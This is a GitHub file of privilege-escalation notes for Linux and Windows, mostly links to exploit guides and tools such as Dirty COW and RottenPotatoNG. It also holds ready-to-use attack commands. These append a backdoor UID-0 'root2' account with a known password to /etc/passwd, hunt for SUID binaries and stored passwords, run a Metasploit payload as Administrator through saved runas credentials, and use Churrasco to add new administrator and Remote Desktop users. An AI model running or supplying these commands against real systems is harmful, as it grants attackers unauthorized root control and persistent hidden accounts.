-
-
Notifications
You must be signed in to change notification settings - Fork 105
/
Copy pathPriv_Esc
84 lines (63 loc) · 3.06 KB
/
Priv_Esc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
===
Privilege escalation using passwd file
credit: https://security.stackexchange.com/questions/151700/privilege-escalation-using-passwd-file
# to generate hash of the password
openssl passwd mrcake
hKLD3431415ZE
# to create a second root user with "mrcake" password
echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
# to switch to a root2
su root2
Password: mrcake
===
https://guif.re/linuxeop
https://guif.re/windowseop
https://netsec.ws/?p=337
http://asystemengineersnotebook.blogspot.com/2017/07/a-dirty-privilege-escalation-trick.html
https://hackmag.com/security/reach-the-root/
grep -Ri 'password' .
find / -perm –4000 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
https://docs.oracle.com/cd/E19683-01/816-4883/6mb2joatb/index.html
Windows
- Check if Powershell is installed (C:\Windows\System32\WindowsPowerShell)
- Check if there is a priv esc script (PowerUp?)
- Check if there is a kernel exploit
- Check the programs running by checking the program files folder (look for old, outdated, vulnerable programs)
- Run cmdkey list
So from the Windows cmd shell (through telnet) type "runas /user:ACCESS\Administrator /savecred" as per above file contents THEN, paste the metaploit PSH code AFTER this and it will pop a meterpreter sessions as Administrator.
https://github.com/GDSSecurity/Windows-Exploit-Suggester
http://www.fuzzysecurity.com/tutorials/16.html
http://pwnwiki.io/#!privesc/windows/index.md
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html?m=1
https://pentestlab.blog/2017/04/19/stored-credentials/
c:\Inetpub>churrasco
churrasco
/churrasco/-->Usage: Churrasco.exe [-d] "command to run"
c:\Inetpub>churrasco -d "net user /add <username> <password>"
c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"
c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"
Linux
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://github.com/rebootuser/LinEnum
http://pwnwiki.io/#!privesc/linux/index.md
https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh
http://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/
https://touhidshaikh.com/blog/?p=790
https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html
https://github.com/pentestmonkey/unix-privesc-check
Enumeration Scripts:
https://github.com/rebootuser/LinEnum
https://github.com/pentestmonkey/unix-privesc-check
https://github.com/sleventyeleven/linuxprivchecker
https://github.com/DominicBreuker/pspy
Binaries:
Linux:
https://github.com/FireFart/dirtycow
https://github.com/dirtycow/dirtycow.github.io
Windows:
https://github.com/breenmachine/RottenPotatoNG
NFS priv esc:
https://www.youtube.com/watch?v=l_AsXsMdkyM
https://medium.com/@Kan1shka9/hacklab-vulnix-walkthrough-b2b71534c0eb
https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/
https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/